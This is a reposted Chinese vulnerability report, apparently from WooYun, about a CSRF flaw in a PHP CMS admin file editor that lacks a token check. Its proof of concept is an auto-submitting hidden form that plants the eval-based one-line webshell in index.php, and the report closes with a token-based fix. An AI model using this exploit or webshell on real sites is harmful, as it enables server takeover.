来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。后台有编辑文件功能,可以编辑php文件,植入一句话。且此功能无to...
|
无token,所以可以通过交互管理员进行Csrf-getshell,全程只需要管理员点击一个网页,不知不觉getshell就自动完成了。
后台有编辑文件功能,可以编辑php文件,植入一句话。 且此功能无token限制,导致可以通过一个Csrf交互来getshell.
POC如下(如运行不正常,为乌云编辑器所致,将中间的空行删去即可):
<form action="http://127.0.0.1/admin/admin.php" method="POST" target="hidden_frame">
<input type="hidden" name="filedata" value="<?php
@eval($_REQUEST['wooyun']);
include
('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER
['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path,
0,1)=='/'){
$path=substr($path,1);
}
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET
['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::$ctrl($path);
}
?>" />
<input type="hidden" name="input" value="index.php" />
<input type="hidden" name="name" value="index.php" />
<input type="hidden" name="action" value="file" />
<input type="hidden" name="ctrl" value="save" />
<input type="hidden" name="path" value="index.php" />
</form><iframe style="DISPLAY: none" id=hidden_frame name=hidden_frame></iframe>
<script>
document.forms[0].submit();
</script>
页面上只是一段简单的文字,但是其实后台已经发起了一次POST请求,在index.php中植入了一句话木马。    修复方案:
后台增加token验证 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
